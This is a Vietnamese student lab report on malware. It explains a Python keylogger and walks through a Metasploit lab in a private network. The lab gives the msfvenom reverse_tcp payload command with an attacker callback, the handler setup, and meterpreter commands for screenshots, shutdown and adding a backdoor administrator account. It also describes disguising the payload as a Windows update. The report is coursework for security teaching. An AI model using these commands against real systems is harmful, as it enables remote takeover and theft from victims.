LAB 06: Malware | Báo cáo thực hành môn An toàn thông tin Trường đại học sư phạm kỹ thuật TP. Hồ Chí Minh
Keylogger là một phần mềm hoặc thiết bị phần cứng có khả năng ghi lại mọi phím được nhấn trên bàn phím. Thông tin này sau đó có thể được sử dụng để đánh cắp mật khẩu, thông tin tài chính và các thông tin cá nhân nhạy cảm khác. - Keylogger có thể được cài đặt trên máy tính theo nhiều cách khác nhau, bao gồm: + Tải xuống và cài đặt phần mềm từ nguồn không đáng tin cậy;+ Mở tệp hoặc liên kết độc hại; + Bị tấn công bởi phần mềm độc hại. Tài liệu giúp bạn tham khảo, ôn tập và đạt kết quả cao. Mời bạn đọc đón xem!
Môn: An toàn thông tin (INSE330380)
Trường: Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh
Thông tin:
Tác giả:
Preview text:
BỘ GIÁO DỤC VÀ ĐÀO TẠO
TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT TP. HCM
KHOA CÔNG NGHỆ THÔNG TIN
BỘ MÔN AN TOÀN THÔNG TIN
BÁO CÁO BÀI THỰC HÀNH LAB 06: MALWARE
GVHD: HUỲNH NGUYÊN CHÍNH
MÃ HP: INSE330380_23_2_03
SINH VIÊN THỰC HIỆN: STT HỌ VÀ TÊN MSSV 1
Lê Quang Trọng Nghĩa 22162029 TP.HCM, 16/4/2024 Lab 6. Malware 1. Keylogger
1.1 Giới thiệu về Keylogger
- Keylogger là một phần mềm hoặc thiết bị phần cứng có khả năng ghi lại mọi phím được
nhấn trên bàn phím. Thông tin này sau đó có thể được sử dụng để đánh cắp mật khẩu,
thông tin tài chính và các thông tin cá nhân nhạy cảm khác.
- Keylogger có thể được cài đặt trên máy tính theo nhiều cách khác nhau, bao gồm:
+ Tải xuống và cài đặt phần mềm từ nguồn không đáng tin cậy
+ Mở tệp hoặc liên kết độc hại
+ Bị tấn công bởi phần mềm độc hại
- Keylogger có thể gây ra nhiều thiệt hại, bao gồm:
+ Đánh cắp thông tin cá nhân và tài chính
+ Lạm dụng tài khoản trực tuyến + Tấn công lừa đảo
1.2 Lập trình ra Keylogger đơn giản bằng ngôn ngữ Python Ngôn ngữ Python
Gói Listener trong thư viện Pynput 1
Giải thích: Đoạn mã Python trên là một trình theo dõi bàn phím đơn giản. Nó sử
dụng thư viện pynput để lắng nghe các sự kiện bàn phím và gọi lại hàm anonymous() mỗi
khi một phím được nhấn. Hàm anonymous() kiểm tra xem phím được nhấn có phải là
phím F12 hay không. Nếu là vậy, hàm sẽ gọi raise SystemExit(0) để thoát khỏi chương
trình. Nếu không, hàm sẽ in ra tên của phím được nhấn lên màn hình và ghi vào file nội
dung được nhấn. Để sử dụng trình theo dõi bàn phím này, chúng ta chỉ cần chạy nó và
sau đó nhấn bất kỳ phím nào trên bàn phím. Tên của phím được nhấn sẽ được in ra lên
màn hình. Nếu bạn nhấn phím F12, chương trình sẽ thoát.
Kết quả sau khi chạy chương trình:
Vừa in ra ở console vừa ghi vào file 2
1.3 Một số chức năng khác của Keylogger
- Ngoài các chức năng chính là ghi lại toàn bộ bàn phím, hacker có thể tạo ra
keylogger có các chức năng hiện đại hơn như:
+ Ghi lại mọi phím được nhấn trên bàn phím, bao gồm cả phím tắt, phím chức
năng và phím mũi tên được định dạng theo chuẩn giúp hacker dễ đánh cắp thông tin
+ Lưu trữ thông tin đã ghi lại vào một tệp nhật ký hoặc gửi thông tin đó đến máy
chủ từ xa hoặc máy hacker
+ Có thể được sử dụng để đánh cắp mật khẩu, thông tin tài chính và các thông tin cá nhân nhạy cảm khác.
+ Có thể được sử dụng để theo dõi hoạt động trực tuyến hay thói quen của người dùng.
2. Malware (phần mềm độc lại) 2.1 Giới thiệu
Attcker sẽ phát tán các chương trình độc hại đến máy nạn nhân. Khi máy nạn nhân
vô tình chạy chương trình độc hại của attacker thì attacker có thể điều khiển máy nạn nhân
2.2 Mục tiêu tấn công:
Usename/password các chương trình của mục tiêu.
Lấy các tài liệu trên máy nạn nhân Leo thang đặc quyền
Chạy các chương trình của Attacker
2.3 Công cụ sử dụng: Metasploit 2.4 Thực hiện Lab
2.4.1 Chuẩn bị hệ thống 3 Tên Thiết bị Số lượng Ghi chú PC Win XP 1 Máy nạn nhân (192.168.73.126) Backtrack 5 r3 1 Dùng cho Attacker (192.168.73.138)
Lưu ý: Máy Windown XP phải tắt tường lửa, các phần mềm diệt virus Mô hình kết nối
2.4.2 Chuẩn bị Malware
Hack hệ thống: Sử dụng metasploit trong Kali
Bước 1: Kiểm tra IP của máy attacker bằng lệnh $ ipconfig (IP: 192.168.73.138) 4
Bước 2: Sử dụng phần mềm Metasploit tạo Malware
- Sử dụng phần mềm Metasplot tạo ra virus có tên dev.exe
# msf6>msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.73.138 LPORT=4444 -f exe >dev.exe
Giải thích: Lệnh trên trong Kali là một lệnh của Metasploit Framework -
một công cụ bảo mật được sử dụng để kiểm tra và khai thác các lỗ hổng bảo
mật. Cụ thể, các tùy chọn được sử dụng trong lệnh này là:
p Windows/meterpreter/reverse_tcp: Chọn payload là meterpreter cho hệ
điều hành Windows và thiết lập kết nối ngược trở lại (reverse connection) với máy chủ của bạn.
LHOST=192.168.73.138: Thiết lập địa chỉ IP của máy attacker của bạn
LPORT=4444: Thiết lập cổng mà mà máy attacker sẽ lắng nghe
f exe: Chọn định dạng tệp tin đầu ra là exe
>dev.exe: Thiết lập đường dẫn và tên tệp tin đầu ra
Lệnh này sẽ tạo ra một tệp tin thực thi trên hệ điều hành Windows có tên là
dev.exe. Tệp tin này sẽ kết nối đến máy chủ của bạn (được chỉ định bởi
LHOST=192.168.73.138) và lắng nghe trên cổng 4444 (được chỉ định bởi
LPORT=4444). Khi tệp tin này được chạy trên máy tính mục tiêu, nó sẽ kết nối đến máy
attacker và cho phép máy attacker kiểm soát máy tính đó từ xa. 5
- Chuyển file virus vào máy nạn nhân
Bước 3: Cấu hình Metasploit máy attacker để khai thác máy nạn nhân Mở Metasploit Framework # msfconsole
Lệnh này khởi động giao diện dòng lệnh của Metasploit Framework, cho phép bạn
truy cập và làm việc với các module và tùy chọn của nó 6 Cấu hình
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.73.138 set LPORT 4444 show options exploit Giải thích lệnh:
+ use exploit/multi/handler: Chọn module handler trong Metasploit Framework.
+ set payload windows/meterpreter/reverse_tcp: Thiết lập payload là
meterpreter cho hệ điều hành Windows và thiết lập kết nối ngược trở lại (reverse
connection) với máy attacker
+ set LHOST 192.168.73.138: Thiết lập địa chỉ IP của máy attacker
+ set LPORT 4444: Thiết lập cổng mà máy attacker sẽ lắng nghe trên
+ show options: Hiển thị danh sách các tùy chọn mà chúng ta vừa thiết lập phía trên
+ exploit: Khởi động module và bắt đầu lắng nghe kết nối từ máy nạn nhân
Sau khi khởi động module thì nó sẽ lắng nghe kết nối từ máy nạn nhân nếu máy
nạn nhân mở virus dev.exe thì máy attacker sẽ bắt được kết nối 7
Bước 4: Thực hiện phát tán virus đến máy nạn nhân
Virus dev.exe có thể phát tán bằng nhiều cách vào máy nạn nhân. Ví dụ như chèn
vào phần mềm lậu, gửi qua email, tin nhắn. hoặc truyền file từ usb sang máy nạn nhân,…
Khi nạn nhân thấy file dev.exe thì nạn nhân sẽ khó phát hiện, không đề phòng và nghĩ chỉ
là file cập nhật của Windows nên chạy bình thường. Khi đó thì máy attacker sẽ kết nối
đến máy nạn nhân, máy attacker đã có quyền kiểm soát máy nạn nhân
Ở đây Windows XP ( máy nạn nhân) đã có file virus dev.exe nhận được sau khi chuyển từ kali sang.
Bước 5: Khai thác máy nạn nhân
Khi máy nạn nhân mở file virus dev.exe
Thì máy attacker sẽ kết nối, và máy attacker đã có quyền kiểm soát máy nạn nhân
Bây giờ máy Attacker có thể khai thác thông tin nạn nhân Nhập lệnh meterpreter
> help để hiển thị tất cả câu lệnh có thể thao tác lên máy nạn nhân Ví dụ như: chụp ảnh
màn hình, quay bằng webcam, tắt nguồn, hiển thị thông tin hệ thống, tạo file, … 8
Hiển thị thông tin hệ thống
Attacker có thể xem thông tin hệ thống máy nạn nhân bằng lệnh
meterpreter > sysinfo
Xem các tiến trình đang chạy bằng lệnh meterpreter > ps 9
Chụp ảnh màn hình
Giả sử máy nạn nhân đang duyệt web, attacker có thể chụp ảnh màn hình và lấy
thông tin quan trọng như tài khoản cá nhân, mật khẩu, hình ảnh,… Máy attacker có thể
chụp ảnh màn hình máy nạn nhân bằng lệnh
meterpreter > screenshot 10
Tạo thư mục trên máy nạn nhân bằng lệnh
meterpreter > mkdir C:/hacker Máy attacker Máy nạn nhân
Tạo user hacker với quyền administrators meterpreter> shell
net user hacker abc123 /add
net localgroup administrators hacker /add 11
Tắt nguồn máy nạn nhân
Attacker có thể tắt nguồn máy nạn nhân bằng lệnh
meterpreter > shutdown Máy attacker 12 Máy nạn nhân
Ngoài ra còn nhiều thứ mà máy attacker có thể làm với máy nạn nhân
3. Dấu hiệu và cách phòng chống các phần mềm độc hại
3.1. Dấu hiệu máy tính của bạn có thể bị nhiễm phần mềm độc hại - Máy tính chạy chậm
- Máy tính bị khởi động lại hoặc tắt đột ngột
- Bạn nhận được thông báo lỗi lạ
- Bạn thấy các cửa sổ bật lên quảng cáo không mong muốn
- Bạn thấy các chương trình mới được cài đặt mà bạn không nhớ đã cài đặt
- Phần mềm quét virus phát hiện nhưng phần mềm không đáng tin cậy 13
3.2. Một số cách phòng chống phần mềm độc hại
- Cài đặt phần mềm chống mã độc uy tín: Đây là cách phòng chống phần mềm độc
hại hiệu quả nhất. Phần mềm chống mã độc sẽ giúp phát hiện và loại bỏ phần mềm độc
hại khỏi máy tính của bạn.
- Cập nhật phần mềm thường xuyên: Các nhà sản xuất phần mềm thường xuyên
phát hành các bản cập nhật để vá các lỗ hổng bảo mật. Do đó, việc cập nhật phần mềm
thường xuyên sẽ giúp máy tính của bạn được bảo vệ tốt hơn khỏi phần mềm độc hại.
- Cẩn thận khi tải xuống và cài đặt phần mềm: Chỉ tải xuống và cài đặt phần mềm
từ các nguồn đáng tin cậy. Tránh tải xuống phần mềm miễn phí từ các trang web không rõ nguồn gốc.
- Sử dụng mật khẩu mạnh: Mật khẩu mạnh sẽ giúp bảo vệ tài khoản của bạn khỏi
bị tấn công. Hãy sử dụng mật khẩu có ít nhất 8 ký tự, bao gồm chữ cái, số và ký tự đặc biệt.
- Sao lưu dữ liệu thường xuyên: Sao lưu dữ liệu thường xuyên sẽ giúp bạn khôi
phục dữ liệu nếu bị mất hoặc bị hỏng do phần mềm độc hại 14